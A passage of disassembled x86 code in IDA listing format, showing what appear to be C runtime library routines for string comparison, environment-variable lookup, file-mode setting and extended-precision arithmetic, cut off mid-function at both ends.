mov [ebp+var_9C], ecx
push 0
mov edx, [ebp+var_A4]
push edx
push offset byte_4923F0
mov eax, [ebp+arg_8]
push eax
mov ecx, [ebp+arg_4]
push ecx
call sub_42FEA0
add esp, 14h
test eax, eax
jnz short loc_42F200
or eax, 0FFFFFFFFh
jmp loc_42F2D6
; ---------------------------------------------------------------------------
loc_42F200: ; CODE XREF: sub_42F050+1A6�j
mov edx, [ebp+var_9C]
mov byte ptr [edx], 0
mov [ebp+var_A0], 0
jmp short loc_42F224
; ---------------------------------------------------------------------------
loc_42F215: ; CODE XREF: sub_42F050:loc_42F2CA�j
mov eax, [ebp+var_A0]
add eax, 1
mov [ebp+var_A0], eax
loc_42F224: ; CODE XREF: sub_42F050+1C3�j
cmp [ebp+var_A0], 4
jge loc_42F2CF
cmp dword_442F58, 1
jle short loc_42F26B
push 4
mov ecx, [ebp+var_A0]
mov dl, byte_4923F0[ecx*2]
mov byte ptr [ebp+var_98], dl
mov eax, [ebp+var_98]
and eax, 0FFh
push eax
call sub_41E750
add esp, 8
mov [ebp+var_A8], eax
jmp short loc_42F29E
; ---------------------------------------------------------------------------
loc_42F26B: ; CODE XREF: sub_42F050+1E8�j
mov ecx, [ebp+var_A0]
mov dl, byte_4923F0[ecx*2]
mov byte ptr [ebp+var_98], dl
mov eax, [ebp+var_98]
and eax, 0FFh
mov ecx, off_442D4C
xor edx, edx
mov dx, [ecx+eax*2]
and edx, 4
mov [ebp+var_A8], edx
loc_42F29E: ; CODE XREF: sub_42F050+219�j
cmp [ebp+var_A8], 0
jz short loc_42F2C8
mov eax, [ebp+var_9C]
movsx ecx, byte ptr [eax]
imul ecx, 0Ah
movsx edx, byte ptr [ebp+var_98]
lea eax, [ecx+edx-30h]
mov ecx, [ebp+var_9C]
mov [ecx], al
jmp short loc_42F2CA
; ---------------------------------------------------------------------------
loc_42F2C8: ; CODE XREF: sub_42F050+255�j
jmp short loc_42F2CF
; ---------------------------------------------------------------------------
loc_42F2CA: ; CODE XREF: sub_42F050+276�j
jmp loc_42F215
; ---------------------------------------------------------------------------
loc_42F2CF: ; CODE XREF: sub_42F050+1DB�j
; sub_42F050:loc_42F2C8�j
xor eax, eax
jmp short loc_42F2D6
; ---------------------------------------------------------------------------
loc_42F2D3: ; CODE XREF: sub_42F050+16D�j
or eax, 0FFFFFFFFh
loc_42F2D6: ; CODE XREF: sub_42F050+148�j
; sub_42F050+164�j ...
mov esp, ebp
pop ebp
retn
sub_42F050 endp
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
mov eax, off_4440D0
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42F2F0 proc near ; CODE XREF: sub_42A890+216�p
; sub_4316E0+50�p
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_433CD8
push offset sub_425F84
mov eax, large fs:0
push eax
mov large fs:0, esp
add esp, 0FFFFFFDCh
push ebx
push esi
push edi
mov [ebp+var_18], esp
cmp dword_4923FC, 0
jnz short loc_42F36E
lea eax, [ebp+var_1C]
push eax
push 1
push offset dword_43301C
push 1
call ds:dword_4942C0
test eax, eax
jz short loc_42F342
mov dword_4923FC, 1
jmp short loc_42F36E
; ---------------------------------------------------------------------------
loc_42F342: ; CODE XREF: sub_42F2F0+44�j
lea ecx, [ebp+var_1C]
push ecx
push 1
push offset dword_433018
push 1
push 0
call ds:dword_4942C4
test eax, eax
jz short loc_42F367
mov dword_4923FC, 2
jmp short loc_42F36E
; ---------------------------------------------------------------------------
loc_42F367: ; CODE XREF: sub_42F2F0+69�j
xor eax, eax
jmp loc_42F549
; ---------------------------------------------------------------------------
loc_42F36E: ; CODE XREF: sub_42F2F0+2D�j
; sub_42F2F0+50�j ...
cmp dword_4923FC, 1
jnz short loc_42F392
mov edx, [ebp+arg_C]
push edx
mov eax, [ebp+arg_8]
push eax
mov ecx, [ebp+arg_4]
push ecx
mov edx, [ebp+arg_0]
push edx
call ds:dword_4942C0
jmp loc_42F549
; ---------------------------------------------------------------------------
loc_42F392: ; CODE XREF: sub_42F2F0+85�j
cmp dword_4923FC, 2
jnz loc_42F547
cmp [ebp+arg_10], 0
jnz short loc_42F3AD
mov eax, dword_492180
mov [ebp+arg_10], eax
loc_42F3AD: ; CODE XREF: sub_42F2F0+B3�j
push 0
push 0
push 0
push 0
mov ecx, [ebp+arg_8]
push ecx
mov edx, [ebp+arg_4]
push edx
push 220h
mov eax, [ebp+arg_10]
push eax
call ds:dword_4943B0
mov [ebp+var_28], eax
cmp [ebp+var_28], 0
jnz short loc_42F3DC
xor eax, eax
jmp loc_42F549
; ---------------------------------------------------------------------------
loc_42F3DC: ; CODE XREF: sub_42F2F0+E3�j
mov [ebp+var_4], 0
mov eax, [ebp+var_28]
add eax, 3
and al, 0FCh
call sub_418D40
mov [ebp+var_30], esp
mov [ebp+var_18], esp
mov ecx, [ebp+var_30]
mov [ebp+var_2C], ecx
mov edx, [ebp+var_28]
push edx
push 0
mov eax, [ebp+var_2C]
push eax
call sub_4189A0
add esp, 0Ch
mov [ebp+var_4], 0FFFFFFFFh
jmp short loc_42F42E
; ---------------------------------------------------------------------------
mov eax, 1
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
mov [ebp+var_2C], 0
mov [ebp+var_4], 0FFFFFFFFh
loc_42F42E: ; CODE XREF: sub_42F2F0+125�j
cmp [ebp+var_2C], 0
jnz short loc_42F43B
xor eax, eax
jmp loc_42F549
; ---------------------------------------------------------------------------
loc_42F43B: ; CODE XREF: sub_42F2F0+142�j
push 0
push 0
mov ecx, [ebp+var_28]
push ecx
mov edx, [ebp+var_2C]
push edx
mov eax, [ebp+arg_8]
push eax
mov ecx, [ebp+arg_4]
push ecx
push 220h
mov edx, [ebp+arg_10]
push edx
call ds:dword_4943B0
test eax, eax
jnz short loc_42F469
xor eax, eax
jmp loc_42F549
; ---------------------------------------------------------------------------
loc_42F469: ; CODE XREF: sub_42F2F0+170�j
mov [ebp+var_4], 1
mov eax, [ebp+var_28]
lea eax, [eax+eax+2]
add eax, 3
and al, 0FCh
call sub_418D40
mov [ebp+var_34], esp
mov [ebp+var_18], esp
mov ecx, [ebp+var_34]
mov [ebp+var_24], ecx
mov [ebp+var_4], 0FFFFFFFFh
jmp short loc_42F4AD
; ---------------------------------------------------------------------------
mov eax, 1
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
mov [ebp+var_24], 0
mov [ebp+var_4], 0FFFFFFFFh
loc_42F4AD: ; CODE XREF: sub_42F2F0+1A4�j
cmp [ebp+var_24], 0
jnz short loc_42F4BA
xor eax, eax
jmp loc_42F549
; ---------------------------------------------------------------------------
loc_42F4BA: ; CODE XREF: sub_42F2F0+1C1�j
cmp [ebp+arg_14], 0
jnz short loc_42F4C9
mov edx, dword_492170
mov [ebp+arg_14], edx
loc_42F4C9: ; CODE XREF: sub_42F2F0+1CE�j
mov eax, [ebp+arg_8]
mov ecx, [ebp+var_24]
mov word ptr [ecx+eax*2], 0FFFFh
mov edx, [ebp+arg_8]
mov eax, [ebp+var_24]
mov word ptr [eax+edx*2-2], 0FFFFh
mov ecx, [ebp+var_24]
push ecx
mov edx, [ebp+var_28]
push edx
mov eax, [ebp+var_2C]
push eax
mov ecx, [ebp+arg_0]
push ecx
mov edx, [ebp+arg_14]
push edx
call ds:dword_4942C4
mov [ebp+var_20], eax
mov eax, [ebp+arg_8]
mov ecx, [ebp+var_24]
xor edx, edx
mov dx, [ecx+eax*2-2]
cmp edx, 0FFFFh
jz short loc_42F528
mov eax, [ebp+arg_8]
mov ecx, [ebp+var_24]
xor edx, edx
mov dx, [ecx+eax*2]
cmp edx, 0FFFFh
jz short loc_42F52C
loc_42F528: ; CODE XREF: sub_42F2F0+222�j
xor eax, eax
jmp short loc_42F549
; ---------------------------------------------------------------------------
loc_42F52C: ; CODE XREF: sub_42F2F0+236�j
mov eax, [ebp+arg_8]
shl eax, 1
push eax
mov ecx, [ebp+var_24]
push ecx
mov edx, [ebp+arg_C]
push edx
call sub_426C00
add esp, 0Ch
mov eax, [ebp+var_20]
jmp short loc_42F549
; ---------------------------------------------------------------------------
loc_42F547: ; CODE XREF: sub_42F2F0+A9�j
xor eax, eax
loc_42F549: ; CODE XREF: sub_42F2F0+79�j
; sub_42F2F0+9D�j ...
lea esp, [ebp-40h]
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_42F2F0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42F560 proc near ; CODE XREF: sub_42AEC0+40�p
; sub_42B010+5F�p ...
var_10 = dword ptr -10h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push edi
push esi
push ebx
mov esi, [ebp+arg_4]
mov edi, [ebp+arg_0]
lea eax, dword_492168
cmp dword ptr [eax+8], 0
jnz short loc_42F5B3
mov al, 0FFh
mov edi, edi
loc_42F57C: ; CODE XREF: sub_42F560+28�j
; sub_42F560+48�j
or al, al
jz short loc_42F5AE
mov al, [esi]
inc esi
mov ah, [edi]
inc edi
cmp ah, al
jz short loc_42F57C
sub al, 41h
cmp al, 1Ah
sbb cl, cl
and cl, 20h
add al, cl
add al, 41h
xchg ah, al
sub al, 41h
cmp al, 1Ah
sbb cl, cl
and cl, 20h
add al, cl
add al, 41h
cmp al, ah
jz short loc_42F57C
sbb al, al
sbb al, 0FFh
loc_42F5AE: ; CODE XREF: sub_42F560+1E�j
movsx eax, al
jmp short loc_42F62B
; ---------------------------------------------------------------------------
loc_42F5B3: ; CODE XREF: sub_42F560+16�j
lock inc dword_49274C
cmp dword_492748, 0
jg short loc_42F5C7
push 0
jmp short loc_42F5DC
; ---------------------------------------------------------------------------
loc_42F5C7: ; CODE XREF: sub_42F560+61�j
lock dec dword_49274C
push 13h
call sub_41BC90
mov [esp+10h+var_10], 1
loc_42F5DC: ; CODE XREF: sub_42F560+65�j
mov eax, 0FFh
xor ebx, ebx
nop
loc_42F5E4: ; CODE XREF: sub_42F560+90�j
; sub_42F560+A8�j
or al, al
jz short loc_42F60F
mov al, [esi]
inc esi
mov bl, [edi]
inc edi
cmp al, bl
jz short loc_42F5E4
push eax
push ebx
call sub_41AEE0
mov ebx, eax
add esp, 4
call sub_41AEE0
add esp, 4
cmp bl, al
jz short loc_42F5E4
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_42F60F: ; CODE XREF: sub_42F560+86�j
mov ebx, eax
pop eax
or eax, eax
jnz short loc_42F61F
lock dec dword_49274C
jmp short loc_42F629
; ---------------------------------------------------------------------------
loc_42F61F: ; CODE XREF: sub_42F560+B4�j
push 13h
call sub_41BD30
add esp, 4
loc_42F629: ; CODE XREF: sub_42F560+BD�j
mov eax, ebx
loc_42F62B: ; CODE XREF: sub_42F560+51�j
pop ebx
pop esi
pop edi
leave
retn
sub_42F560 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42F630 proc near ; CODE XREF: sub_42B010+11B�p
; sub_42B010+2D4�p ...
var_10 = dword ptr -10h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push edi
push esi
push ebx
mov ecx, [ebp+arg_8]
or ecx, ecx
jz loc_42F72A
mov esi, [ebp+arg_0]
mov edi, [ebp+arg_4]
lea eax, dword_492168
cmp dword ptr [eax+8], 0
jnz short loc_42F6A1
mov bh, 41h
mov bl, 5Ah
mov dh, 20h
lea ecx, [ecx+0]
loc_42F65C: ; CODE XREF: sub_42F630+53�j
mov ah, [esi]
or ah, ah
mov al, [edi]
jz short loc_42F685
or al, al
jz short loc_42F685
inc esi
inc edi
cmp ah, bh
jb short loc_42F674
cmp ah, bl
ja short loc_42F674
add ah, dh
loc_42F674: ; CODE XREF: sub_42F630+3C�j
; sub_42F630+40�j
cmp al, bh
jb short loc_42F67E
cmp al, bl
ja short loc_42F67E
add al, dh
loc_42F67E: ; CODE XREF: sub_42F630+46�j
; sub_42F630+4A�j
cmp ah, al
jnz short loc_42F68F
dec ecx
jnz short loc_42F65C
loc_42F685: ; CODE XREF: sub_42F630+32�j
; sub_42F630+36�j
xor ecx, ecx
cmp ah, al
jz loc_42F72A
loc_42F68F: ; CODE XREF: sub_42F630+50�j
mov ecx, 0FFFFFFFFh
jb loc_42F72A
neg ecx
jmp loc_42F72A
; ---------------------------------------------------------------------------
loc_42F6A1: ; CODE XREF: sub_42F630+21�j
lock inc dword_49274C
cmp dword_492748, 0
jg short loc_42F6B5
push 0
jmp short loc_42F6CE
; ---------------------------------------------------------------------------
loc_42F6B5: ; CODE XREF: sub_42F630+7F�j
lock dec dword_49274C
mov ebx, ecx
push 13h
call sub_41BC90
mov [esp+10h+var_10], 1
mov ecx, ebx
loc_42F6CE: ; CODE XREF: sub_42F630+83�j
xor eax, eax
xor ebx, ebx
mov edi, edi
loc_42F6D4: ; CODE XREF: sub_42F630+CD�j
mov al, [esi]
or eax, eax
mov bl, [edi]
jz short loc_42F6FF
or ebx, ebx
jz short loc_42F6FF
inc esi
inc edi
push ecx
push eax
push ebx
call sub_41AEE0
mov ebx, eax
add esp, 4
call sub_41AEE0
add esp, 4
pop ecx
cmp eax, ebx
jnz short loc_42F705
dec ecx
jnz short loc_42F6D4
loc_42F6FF: ; CODE XREF: sub_42F630+AA�j
; sub_42F630+AE�j
xor ecx, ecx
cmp eax, ebx
jz short loc_42F70E
loc_42F705: ; CODE XREF: sub_42F630+CA�j
mov ecx, 0FFFFFFFFh
jb short loc_42F70E
neg ecx
loc_42F70E: ; CODE XREF: sub_42F630+D3�j
; sub_42F630+DA�j
pop eax
or eax, eax
jnz short loc_42F71C
lock dec dword_49274C
jmp short loc_42F72A
; ---------------------------------------------------------------------------
loc_42F71C: ; CODE XREF: sub_42F630+E1�j
mov ebx, ecx
push 13h
call sub_41BD30
add esp, 4
mov ecx, ebx
loc_42F72A: ; CODE XREF: sub_42F630+B�j
; sub_42F630+59�j ...
mov eax, ecx
pop ebx
pop esi
pop edi
leave
retn
sub_42F630 endp
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
push ecx
push 0Ch
call sub_41BC90
add esp, 4
mov eax, [ebp+8]
push eax
call sub_42F770
add esp, 4
mov [ebp-4], eax
push 0Ch
call sub_41BD30
add esp, 4
mov eax, [ebp-4]
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42F770 proc near ; CODE XREF: sub_42BAC0+3A�p
; .text:0042F752�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 8
mov eax, dword_4920B0
mov [ebp+var_8], eax
cmp dword_493788, 0
jnz short loc_42F78E
xor eax, eax
jmp loc_42F832
; ---------------------------------------------------------------------------
loc_42F78E: ; CODE XREF: sub_42F770+15�j
cmp [ebp+var_8], 0
jnz short loc_42F7B6
cmp dword_4920B8, 0
jz short loc_42F7B6
call sub_430240
test eax, eax
jz short loc_42F7AD
xor eax, eax
jmp loc_42F832
; ---------------------------------------------------------------------------
loc_42F7AD: ; CODE XREF: sub_42F770+34�j
mov ecx, dword_4920B0
mov [ebp+var_8], ecx
loc_42F7B6: ; CODE XREF: sub_42F770+22�j
; sub_42F770+2B�j
cmp [ebp+var_8], 0
jz short loc_42F830
cmp [ebp+arg_0], 0
jz short loc_42F830
mov edx, [ebp+arg_0]
push edx
call sub_418E70
add esp, 4
mov [ebp+var_4], eax
loc_42F7D1: ; CODE XREF: sub_42F770+BE�j
mov eax, [ebp+var_8]
cmp dword ptr [eax], 0
jz short loc_42F830
mov ecx, [ebp+var_8]
mov edx, [ecx]
push edx
call sub_418E70
add esp, 4
cmp eax, [ebp+var_4]
jbe short loc_42F825
mov eax, [ebp+var_8]
mov ecx, [eax]
mov edx, [ebp+var_4]
movsx eax, byte ptr [ecx+edx]
cmp eax, 3Dh
jnz short loc_42F825
mov ecx, [ebp+var_4]
push ecx
mov edx, [ebp+arg_0]
push edx
mov eax, [ebp+var_8]
mov ecx, [eax]
push ecx
call sub_4301F0
add esp, 0Ch
test eax, eax
jnz short loc_42F825
mov edx, [ebp+var_8]
mov eax, [edx]
mov ecx, [ebp+var_4]
lea eax, [eax+ecx+1]
jmp short loc_42F832
; ---------------------------------------------------------------------------
loc_42F825: ; CODE XREF: sub_42F770+7A�j
; sub_42F770+8B�j ...
mov edx, [ebp+var_8]
add edx, 4
mov [ebp+var_8], edx
jmp short loc_42F7D1
; ---------------------------------------------------------------------------
loc_42F830: ; CODE XREF: sub_42F770+4A�j
; sub_42F770+50�j ...
xor eax, eax
loc_42F832: ; CODE XREF: sub_42F770+19�j
; sub_42F770+38�j ...
mov esp, ebp
pop ebp
retn
sub_42F770 endp
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+8]
cmp eax, dword_492520
jnb short loc_42F871
mov ecx, [ebp+8]
sar ecx, 5
mov edx, [ebp+8]
and edx, 1Fh
imul edx, 24h
mov eax, dword_492420[ecx*4]
movsx ecx, byte ptr [eax+edx+4]
and ecx, 1
test ecx, ecx
jnz short loc_42F881
loc_42F871: ; CODE XREF: .text:0042F84D�j
call sub_422F20
mov dword ptr [eax], 9
or eax, 0FFFFFFFFh
jmp short loc_42F8AF
; ---------------------------------------------------------------------------
loc_42F881: ; CODE XREF: .text:0042F86F�j
mov edx, [ebp+8]
push edx
call sub_4280C0
add esp, 4
mov eax, [ebp+0Ch]
push eax
mov ecx, [ebp+8]
push ecx
call sub_42F8C0
add esp, 8
mov [ebp-4], eax
mov edx, [ebp+8]
push edx
call sub_428150
add esp, 4
mov eax, [ebp-4]
loc_42F8AF: ; CODE XREF: .text:0042F87F�j
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42F8C0 proc near ; CODE XREF: sub_42C610+D4�p
; sub_42C610+1A6�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_0]
sar eax, 5
mov ecx, [ebp+arg_0]
and ecx, 1Fh
imul ecx, 24h
mov edx, dword_492420[eax*4]
movsx eax, byte ptr [edx+ecx+4]
and eax, 80h
mov [ebp+var_4], eax
cmp [ebp+arg_4], 8000h
jnz short loc_42F929
mov ecx, [ebp+arg_0]
sar ecx, 5
mov edx, [ebp+arg_0]
and edx, 1Fh
imul edx, 24h
mov eax, dword_492420[ecx*4]
mov cl, [eax+edx+4]
and cl, 7Fh
mov edx, [ebp+arg_0]
sar edx, 5
mov eax, [ebp+arg_0]
and eax, 1Fh
imul eax, 24h
mov edx, dword_492420[edx*4]
mov [edx+eax+4], cl
jmp short loc_42F97A
; ---------------------------------------------------------------------------
loc_42F929: ; CODE XREF: sub_42F8C0+2E�j
cmp [ebp+arg_4], 4000h
jnz short loc_42F96A
mov eax, [ebp+arg_0]
sar eax, 5
mov ecx, [ebp+arg_0]
and ecx, 1Fh
imul ecx, 24h
mov edx, dword_492420[eax*4]
mov al, [edx+ecx+4]
or al, 80h
mov ecx, [ebp+arg_0]
sar ecx, 5
mov edx, [ebp+arg_0]
and edx, 1Fh
imul edx, 24h
mov ecx, dword_492420[ecx*4]
mov [ecx+edx+4], al
jmp short loc_42F97A
; ---------------------------------------------------------------------------
loc_42F96A: ; CODE XREF: sub_42F8C0+70�j
call sub_422F20
mov dword ptr [eax], 16h
or eax, 0FFFFFFFFh
jmp short loc_42F98B
; ---------------------------------------------------------------------------
loc_42F97A: ; CODE XREF: sub_42F8C0+67�j
; sub_42F8C0+A8�j
mov eax, [ebp+var_4]
neg eax
sbb eax, eax
and eax, 0FFFFC000h
add eax, 8000h
loc_42F98B: ; CODE XREF: sub_42F8C0+B8�j
mov esp, ebp
pop ebp
retn
sub_42F8C0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42F990 proc near ; CODE XREF: sub_42D6C0+2B5�p
; sub_42FDD0+B5�p
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 48h
mov word ptr [ebp+var_2C], 0
mov [ebp+var_4], 0
mov [ebp+var_14], 0
mov [ebp+var_10], 0
mov [ebp+var_C], 0
mov eax, [ebp+arg_0]
mov cx, [eax+0Ah]
mov word ptr [ebp+var_18], cx
mov edx, [ebp+arg_4]
mov ax, [edx+0Ah]
mov word ptr [ebp+var_20], ax
mov ecx, [ebp+var_18]
and ecx, 0FFFFh
mov edx, [ebp+var_20]
and edx, 0FFFFh
xor ecx, edx
and ecx, 8000h
mov word ptr [ebp+var_2C], cx
mov ax, word ptr [ebp+var_18]
and ax, 7FFFh
mov word ptr [ebp+var_18], ax
mov cx, word ptr [ebp+var_20]
and cx, 7FFFh
mov word ptr [ebp+var_20], cx
mov edx, [ebp+var_18]
and edx, 0FFFFh
mov eax, [ebp+var_20]
and eax, 0FFFFh
add edx, eax
mov word ptr [ebp+var_30], dx
mov ecx, [ebp+var_18]
and ecx, 0FFFFh
cmp ecx, 7FFFh
jge short loc_42FA4D
mov edx, [ebp+var_20]
and edx, 0FFFFh
cmp edx, 7FFFh
jge short loc_42FA4D
mov eax, [ebp+var_30]
and eax, 0FFFFh
cmp eax, 0BFFDh
jle short loc_42FA84
loc_42FA4D: ; CODE XREF: sub_42F990+9B�j
; sub_42F990+AC�j
mov ecx, [ebp+var_2C]
and ecx, 0FFFFh
neg ecx
sbb ecx, ecx
and ecx, 80000000h
add ecx, 7FFF8000h
mov edx, [ebp+arg_0]
mov [edx+8], ecx
mov eax, [ebp+arg_0]
mov dword ptr [eax+4], 0
mov ecx, [ebp+arg_0]
mov dword ptr [ecx], 0
jmp loc_42FDC9
; ---------------------------------------------------------------------------
loc_42FA84: ; CODE XREF: sub_42F990+BB�j
mov edx, [ebp+var_30]
and edx, 0FFFFh
cmp edx, 3FBFh
jg short loc_42FAB7
mov eax, [ebp+arg_0]
mov dword ptr [eax+8], 0
mov ecx, [ebp+arg_0]
mov dword ptr [ecx+4], 0
mov edx, [ebp+arg_0]
mov dword ptr [edx], 0
jmp loc_42FDC9
; ---------------------------------------------------------------------------
loc_42FAB7: ; CODE XREF: sub_42F990+103�j
mov eax, [ebp+var_18]
and eax, 0FFFFh
test eax, eax
jnz short loc_42FAFD
mov cx, word ptr [ebp+var_30]
add cx, 1
mov word ptr [ebp+var_30], cx
mov edx, [ebp+arg_0]
mov eax, [edx+8]
and eax, 7FFFFFFFh
test eax, eax
jnz short loc_42FAFD
mov ecx, [ebp+arg_0]
cmp dword ptr [ecx+4], 0
jnz short loc_42FAFD
mov edx, [ebp+arg_0]
cmp dword ptr [edx], 0
jnz short loc_42FAFD
mov eax, [ebp+arg_0]
mov word ptr [eax+0Ah], 0
jmp loc_42FDC9
; ---------------------------------------------------------------------------
loc_42FAFD: ; CODE XREF: sub_42F990+131�j
; sub_42F990+14C�j ...
mov ecx, [ebp+var_20]
and ecx, 0FFFFh
test ecx, ecx
jnz short loc_42FB59
mov dx, word ptr [ebp+var_30]
add dx, 1
mov word ptr [ebp+var_30], dx
mov eax, [ebp+arg_4]
mov ecx, [eax+8]
and ecx, 7FFFFFFFh
test ecx, ecx
jnz short loc_42FB59
mov edx, [ebp+arg_4]
cmp dword ptr [edx+4], 0
jnz short loc_42FB59
mov eax, [ebp+arg_4]
cmp dword ptr [eax], 0
jnz short loc_42FB59
mov ecx, [ebp+arg_0]
mov dword ptr [ecx+8], 0
mov edx, [ebp+arg_0]
mov dword ptr [edx+4], 0
mov eax, [ebp+arg_0]
mov dword ptr [eax], 0
jmp loc_42FDC9
; ---------------------------------------------------------------------------
loc_42FB59: ; CODE XREF: sub_42F990+178�j
; sub_42F990+194�j ...
mov [ebp+var_28], 0
mov [ebp+var_1C], 0
jmp short loc_42FB72
; ---------------------------------------------------------------------------
loc_42FB69: ; CODE XREF: sub_42F990+29C�j
mov ecx, [ebp+var_1C]
add ecx, 1
mov [ebp+var_1C], ecx
loc_42FB72: ; CODE XREF: sub_42F990+1D7�j
cmp [ebp+var_1C], 5
jge loc_42FC31
mov edx, [ebp+var_1C]
shl edx, 1
mov [ebp+var_24], edx
mov [ebp+var_8], 8
mov eax, 5
sub eax, [ebp+var_1C]
mov [ebp+var_34], eax
jmp short loc_42FBA1
; ---------------------------------------------------------------------------
loc_42FB98: ; CODE XREF: sub_42F990+28E�j
mov ecx, [ebp+var_34]
sub ecx, 1
mov [ebp+var_34], ecx
loc_42FBA1: ; CODE XREF: sub_42F990+206�j
cmp [ebp+var_34], 0
jle short loc_42FC23
mov edx, [ebp+arg_0]
add edx, [ebp+var_24]
mov [ebp+var_38], edx
mov eax, [ebp+arg_4]
add eax, [ebp+var_8]
mov [ebp+var_3C], eax
mov ecx, [ebp+var_28]
lea edx, [ebp+ecx+var_14]
mov [ebp+var_40], edx
mov eax, [ebp+var_38]
xor ecx, ecx
mov cx, [eax]
mov edx, [ebp+var_3C]
xor eax, eax
mov ax, [edx]
imul ecx, eax
mov [ebp+var_44], ecx
mov ecx, [ebp+var_40]
push ecx
mov edx, [ebp+var_44]
push edx
mov eax, [ebp+var_40]
mov ecx, [eax]
push ecx
call sub_42C840
add esp, 0Ch
mov [ebp+var_48], eax
cmp [ebp+var_48], 0
jz short loc_42FC0C
mov edx, [ebp+var_28]
mov ax, word ptr [ebp+edx+var_10]
add ax, 1
mov ecx, [ebp+var_28]
mov word ptr [ebp+ecx+var_10], ax
loc_42FC0C: ; CODE XREF: sub_42F990+266�j
mov edx, [ebp+var_24]
add edx, 2
mov [ebp+var_24], edx
mov eax, [ebp+var_8]
sub eax, 2
mov [ebp+var_8], eax
jmp loc_42FB98
; ---------------------------------------------------------------------------
loc_42FC23: ; CODE XREF: sub_42F990+215�j
mov ecx, [ebp+var_28]
add ecx, 2
mov [ebp+var_28], ecx
jmp loc_42FB69
; ---------------------------------------------------------------------------
loc_42FC31: ; CODE XREF: sub_42F990+1E6�j
mov dx, word ptr [ebp+var_30]
sub dx, 3FFEh
mov word ptr [ebp+var_30], dx
loc_42FC3E: ; CODE XREF: sub_42F990+2DB�j
movsx eax, word ptr [ebp+var_30]
test eax, eax
jle short loc_42FC6D
mov ecx, [ebp+var_C]
and ecx, 80000000h
test ecx, ecx
jnz short loc_42FC6D
lea edx, [ebp+var_14]
push edx
call sub_42C930
add esp, 4
mov ax, word ptr [ebp+var_30]
sub ax, 1
mov word ptr [ebp+var_30], ax
jmp short loc_42FC3E
; ---------------------------------------------------------------------------
loc_42FC6D: ; CODE XREF: sub_42F990+2B4�j
; sub_42F990+2C1�j
movsx ecx, word ptr [ebp+var_30]
test ecx, ecx
jg short loc_42FCCD
mov dx, word ptr [ebp+var_30]
sub dx, 1
mov word ptr [ebp+var_30], dx
loc_42FC81: ; CODE XREF: sub_42F990+32A�j
movsx eax, word ptr [ebp+var_30]
test eax, eax
jge short loc_42FCBC
mov ecx, [ebp+var_14]
and ecx, 0FFFFh
and ecx, 1
test ecx, ecx
jz short loc_42FCA2
mov edx, [ebp+var_4]
add edx, 1
mov [ebp+var_4], edx
loc_42FCA2: ; CODE XREF: sub_42F990+307�j
lea eax, [ebp+var_14]
push eax
call sub_42C990
add esp, 4
mov cx, word ptr [ebp+var_30]
add cx, 1
mov word ptr [ebp+var_30], cx
jmp short loc_42FC81
; ---------------------------------------------------------------------------
loc_42FCBC: ; CODE XREF: sub_42F990+2F7�j
cmp [ebp+var_4], 0
jz short loc_42FCCD
mov dx, word ptr [ebp+var_14]
or dl, 1
mov word ptr [ebp+var_14], dx
loc_42FCCD: ; CODE XREF: sub_42F990+2E3�j
; sub_42F990+330�j
mov eax, [ebp+var_14]
and eax, 0FFFFh
cmp eax, 8000h
jg short loc_42FCED
mov ecx, [ebp+var_14]
and ecx, 1FFFFh
cmp ecx, 18000h
jnz short loc_42FD4E
loc_42FCED: ; CODE XREF: sub_42F990+34A�j
cmp [ebp+var_14+2], 0FFFFFFFFh
jnz short loc_42FD45
mov [ebp+var_14+2], 0
cmp [ebp+var_10+2], 0FFFFFFFFh
jnz short loc_42FD3A
mov [ebp+var_10+2], 0
mov edx, [ebp+var_C+2]
and edx, 0FFFFh
cmp edx, 0FFFFh
jnz short loc_42FD2C
mov word ptr [ebp+var_C+2], 8000h
mov ax, word ptr [ebp+var_30]
add ax, 1
mov word ptr [ebp+var_30], ax
jmp short loc_42FD38
; ---------------------------------------------------------------------------
